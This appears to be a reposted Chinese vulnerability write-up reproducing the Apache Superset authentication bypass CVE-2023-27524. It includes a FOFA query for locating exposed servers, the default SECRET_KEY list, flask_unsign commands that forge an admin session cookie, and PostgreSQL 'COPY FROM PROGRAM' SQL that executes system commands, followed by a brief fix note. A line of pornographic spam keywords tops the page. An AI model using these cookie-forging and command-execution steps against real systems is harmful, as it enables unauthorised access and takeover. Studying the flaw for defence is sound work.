国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

CVE-2023-27524 Apache Superset 身份認證繞過漏洞

這篇具有很好參考價值的文章主要介紹了CVE-2023-27524 Apache Superset 身份認證繞過漏洞。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

漏洞簡介

CVE-2023-27524 Apache Superset 身份認證繞過漏洞

Apache Superset是一個開源的數(shù)據(jù)可視化和數(shù)據(jù)探測平臺,它基于Python構建,使用了一些類似于Django和Flask的Python web框架。提供了一個用戶友好的界面,可以輕松地創(chuàng)建和共享儀表板、查詢和可視化數(shù)據(jù),也可以集成到其他應用程序中。由于用戶在默認安裝過程中,未對SECRET_KEY的默認值進行更改,未經(jīng)身份驗證的攻擊者通過偽造管理員身份進行訪問后臺,并通過后臺原本數(shù)據(jù)庫執(zhí)行功能實現(xiàn)命令執(zhí)行操作。

?

環(huán)境搭建

可以通過 fofa 來搜索相關網(wǎng)站

"Apache Superset"

CVE-2023-27524 Apache Superset 身份認證繞過漏洞

這里我們通過 docker 來在本地搭建環(huán)境

CVE-2023-27524 Apache Superset 身份認證繞過漏洞

git?clone?https://github.com/apache/superset.git
cd?superset
git?checkout?2.0.0
TAG=2.0.0?docker-compose?-f?docker-compose-non-dev.yml?pull
TAG=2.0.0?docker-compose?-f?docker-compose-non-dev.yml?up

官網(wǎng)提供的方法 并沒有搭建成功,還是直接在docker 倉庫中查找

https://hub.docker.com/r/apache/superset/tags?page=1&ordering=last_updated&name=2.0.0

CVE-2023-27524 Apache Superset 身份認證繞過漏洞

docker?pull?apache/superset:2.0.0
docker?exec?-it?superset?superset?fab?create-admin?--username?admin?--firstname?Superset??--lastname?Admin?--email?admin@superset.com?--password?admin
docker?exec?-it?superset?superset?db?upgrade
docker?exec?-it?superset?superset?load_examples
docker?exec?-it?superset?superset?init

?

漏洞復現(xiàn)

利用腳本檢測是否存在漏洞并生成相對應的 cookie

CVE-2023-27524 Apache Superset 身份認證繞過漏洞

訪問主頁抓取數(shù)據(jù)包

CVE-2023-27524 Apache Superset 身份認證繞過漏洞

將生成的 session 替換原本的 session

CVE-2023-27524 Apache Superset 身份認證繞過漏洞

成功登錄

CVE-2023-27524 Apache Superset 身份認證繞過漏洞

接下來就是想辦法 getshell 網(wǎng)絡上的文章上是通過后臺數(shù)據(jù)庫執(zhí)行語句來獲取權限。

經(jīng)過復現(xiàn)分析,發(fā)現(xiàn)存在的問題還比較多,首先是默認情況下執(zhí)行語句僅僅支持 SELECT ,需要修改數(shù)據(jù)庫的權限允許其他的一些語句(but 一些版本上是沒有對數(shù)據(jù)庫的操作權限的),然后就是獲取的權限,本質上也只是獲取了數(shù)據(jù)庫的執(zhí)行權限,數(shù)據(jù)庫有可能并不與 superset 在同一服務器上,再有就是需要數(shù)據(jù)庫本身也需要存在漏洞才可以,我這里選取了 (CVE-2019-9193)PostgreSQL 高權限命令執(zhí)行漏洞來復現(xiàn)漏洞。

CVE-2023-27524 Apache Superset 身份認證繞過漏洞

CVE-2023-27524 Apache Superset 身份認證繞過漏洞

CVE-2023-27524 Apache Superset 身份認證繞過漏洞

DROP?TABLE?IF?EXISTS?cmd_exec;
CREATE?TABLE?cmd_exec(cmd_output?text);
COPY?cmd_exec?FROM?PROGRAM?'id';
SELECT?*?FROM?cmd_exec;

CVE-2023-27524 Apache Superset 身份認證繞過漏洞

漏洞分析

感覺這個漏洞有點像前段時間爆出來的 nacos 身份認證繞過漏洞 存在默認的密鑰

SECRET_KEYS?=?[
????b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h',??#?version?<?1.4.1
????b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET',??????????#?version?>=?1.4.1
????b'thisISaSECRET_1234',????????????????????????????#?deployment?template
????b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY',??????????#?documentation
????b'TEST_NON_DEV_SECRET'????????????????????????????#?docker?compose
]

Superset 是用 Python 編寫的,基于 Flask Web 框架。基于 Flask 的應用程序的常見做法是使用加密簽名的會話 cookie 進行用戶狀態(tài)管理。當用戶登錄時,Web 應用程序將包含用戶標識符的會話 cookie 發(fā)送回最終用戶的瀏覽器。Web 應用程序使用 SECERT_KEY 對 cookie 進行簽名,該值應該時隨機生成的,通常存儲在本地配置文件中,對于每個 Web 請求,瀏覽器都會將已簽名的會話 cookie 發(fā)送回應用程序,然后應用程序驗證 cookie 上的簽名以處理請求之前重新驗證用戶。

整段描述下面我感覺跟 JWT 的相關驗證方式差不太多,我們具體來操作看看。

CVE-2023-27524 Apache Superset 身份認證繞過漏洞

首先就是請求的時候我們可以看到 cookie 值 可以解碼成功,通過爆破(當然我們這里是已經(jīng)已知這個 key 值),偽造生成用戶的 cookie,替換數(shù)據(jù)包中的cookie 值,就成功登錄成功,之后再次請求的時候,發(fā)現(xiàn)我們添加的字段已經(jīng)被保存在 session 值中

>>>?from?flask_unsign?import?session
>>>?session.decode("eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiOGUzOTdiZTQ2ZjVlZjJiYTc1NjI4MWQxODE2NTAyMWEzMzcxYjI3OCIsImxvY2FsZSI6ImVuIn0.ZJAEeQ.wVfrGzupbWdw4R1OlzUwUqhGMMY")
{'_fresh':?False,?'csrf_token':?'8e397be46f5ef2ba756281d18165021a3371b278',?'locale':?'en'}
>>>?session.sign({'_user_id':?1,?'user_id':?1},'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET')
'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZJAFNg.oWyP7v-1l0qOHFOMjSd-cFiVQLY'
>>>?session.decode(".eJxFzEEOhCAQBMC_9JmDwMZBPkOUaaKRaALuabN_15sPqPohlca-Ipa5dhqkb2dLmyJag9xbSde580CEjoHiQlYOlt4VDVMe3CjTRxYv3i_qGEQsDOqZ58rHPNDgHf83roYh1w.ZJAFVw.IwmWyTU1bvoY2nhlFYdmwXNNtTM")
{'_fresh':?False,?'_user_id':?1,?'csrf_token':?'d68e728cde01e32fd89c0267947b3733bd2e8771',?'locale':?'en',?'user_id':?1}

CVE-2023-27524 Apache Superset 身份認證繞過漏洞

漏洞修復

拒絕在非調(diào)試環(huán)境中使用默認密碼啟動

CVE-2023-27524 Apache Superset 身份認證繞過漏洞

CVE-2023-27524 Apache Superset 身份認證繞過漏洞文章來源地址http://www.zghlxwxcb.cn/news/detail-496495.html

到了這里,關于CVE-2023-27524 Apache Superset 身份認證繞過漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉載,請注明出處: 如若內(nèi)容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • Smartbi 身份認證繞過漏洞

    因為自己搭建的環(huán)境存在一些問題,可能是版本過高的原因,(奇奇怪怪的問題,用戶沒有權限),所以目前僅僅做概念性驗證,對漏洞的原理進行分析。 在未登錄的情況下訪問接口? /smartbi/vision/RMIServlet ? 我們可以比較明顯的看到對應的處理類? CheckIsLoggedFilter ? smartbi.fre

    2024年02月16日
    瀏覽(22)
  • 【嚴重】Grafana Azure AD環(huán)境身份認證繞過漏洞

    【嚴重】Grafana Azure AD環(huán)境身份認證繞過漏洞

    ?Grafana 是一個跨平臺、開源的數(shù)據(jù)可視化網(wǎng)絡應用平臺。Azure AD 是由微軟提供的一種云身份驗證和訪問管理服務。 在 Azure AD 中,多個用戶可以擁有相同的電子郵件地址。攻擊者可以創(chuàng)建一個與目標 Grafana 賬戶相同的電子郵件地址的惡意帳戶,并且在 Azure AD 中配置支持多租戶

    2024年02月17日
    瀏覽(24)
  • 【漏洞復現(xiàn)-通達OA】通達OA share身份認證繞過漏洞

    【漏洞復現(xiàn)-通達OA】通達OA share身份認證繞過漏洞

    通達OA(Office Anywhere網(wǎng)絡智能辦公系統(tǒng))是中國通達公司的一套協(xié)同辦公自動化軟件。通達OA /share/handle.php存在一個認證繞過漏洞,利用該漏洞可以實現(xiàn)任意用戶登錄。攻擊者可以通過構造惡意攻擊代碼,成功登錄系統(tǒng)管理員賬戶,繼而在系統(tǒng)后臺上傳惡意文件控制網(wǎng)站服務器

    2024年02月19日
    瀏覽(70)
  • 【備忘錄】修復docker環(huán)境下的nacos安全漏洞:身份認證繞過漏洞

    【備忘錄】修復docker環(huán)境下的nacos安全漏洞:身份認證繞過漏洞

    報告截取內(nèi)容如下 1.1 訪問登錄口用戶名輸入nacos密碼輸入任意值,進行抓包 1.2 偽造登錄憑證 添加有效登錄時間戳 登錄信息中 在payload中輸入nacos與時間戳 并添加入naco s默認密鑰 SecretKey012345678901234567890123456789012345678901234567890123456789 同時選中base64加密 點擊生成 1.3 登錄包中新

    2024年02月01日
    瀏覽(20)
  • Apache Hudi DeltaStreamer 接入CDC數(shù)據(jù)時如何完成 Kafka 的身份認證?

    題目有些拗口,簡短截說,我們對于Apache Hudi DeltaStreamer在接入CDC數(shù)據(jù)時,對于其如何通過 Kafka 的身份認證,做了一系列測試和研究,有如下明確結論: .?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?

    2024年02月16日
    瀏覽(25)
  • 【漏洞通告】 CVE-2022-40664 Apache Shiro 身份驗證繞過漏洞

    目錄 0x01 聲明: 0x02 簡介:?? 0x03 漏洞概述: 0x04 影響版本: 0x05 漏洞復現(xiàn):(暫未公開利用方式) 0x06 臨時措施 0x07 修復建議: ????????僅供學習參考使用,請勿用作違法用途,否則后果自負。 ????????Apache Shiro是一個強大且易用的Java安全框架,它具有身份驗證、

    2024年02月13日
    瀏覽(61)
  • 2023身份識別技術大會 | 安全證件 | 數(shù)字認證 | 生物識別 | 公共安全安防身份技術展覽會

    展會名稱: ?2023身份識別技術大會 | 安全證件 | 數(shù)字認證 | 生物識別 | 公共安全安防身份技術展覽會 舉辦時間: 2023年5月17-18日 舉辦地點:? 北京 國家會議中心 指導單位: ?公安部科技信息化局 主辦單位: ?多維身份識別與可信認證技術國家工程研究中心 中國國際科技促

    2024年02月07日
    瀏覽(27)
  • F5 BIG-IP 身份驗證繞過漏洞( CVE-2023-46747)

    F5 BIG-IP 身份驗證繞過漏洞( CVE-2023-46747)

    F5 BIG-IP是一款提供負載均衡、安全保護和性能優(yōu)化的應用交付控制器。 F5 BIG-IP 的配置實用程序中存在一個嚴重漏洞(編號為 CVE-2023-46747),允許遠程訪問配置實用程序的攻擊者執(zhí)行未經(jīng)身份驗證的遠程代碼執(zhí)行。 該漏洞的 CVSS v3.1 評分為 9.8,評級為“嚴重”,因為無需身份

    2024年02月06日
    瀏覽(28)
  • 【中危】 Apache NiFi 連接 URL 驗證繞過漏洞 (CVE-2023-40037)

    【中?!?Apache NiFi 連接 URL 驗證繞過漏洞 (CVE-2023-40037)

    Apache NiFi 是一個開源的數(shù)據(jù)流處理和自動化工具。 在受影響版本中,由于多個Processors和Controller Services在配置JDBC和JNDI JMS連接時對URL參數(shù)過濾不完全。使用startsWith方法過濾用戶輸入URL,導致過濾可以被繞過。攻擊者可以通過構造特定格式來繞過連接URL驗證,可能造成數(shù)據(jù)泄露

    2024年02月12日
    瀏覽(33)
  • 統(tǒng)一身份認證,構建數(shù)字時代的安全壁壘——統(tǒng)一身份認證介紹、原理和實現(xiàn)方法

    隨著數(shù)字化時代的來臨,個人和機構在互聯(lián)網(wǎng)上的活動越來越頻繁,對于身份認證的需求也愈發(fā)迫切。為了有效應對身份欺詐、數(shù)據(jù)泄露等問題,統(tǒng)一身份認證(Unified Identity Authentication)應運而生。 在本文博主將介紹統(tǒng)一身份認證的概念、原理以及其具體的實現(xiàn)方案。 統(tǒng)一

    2024年02月03日
    瀏覽(29)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包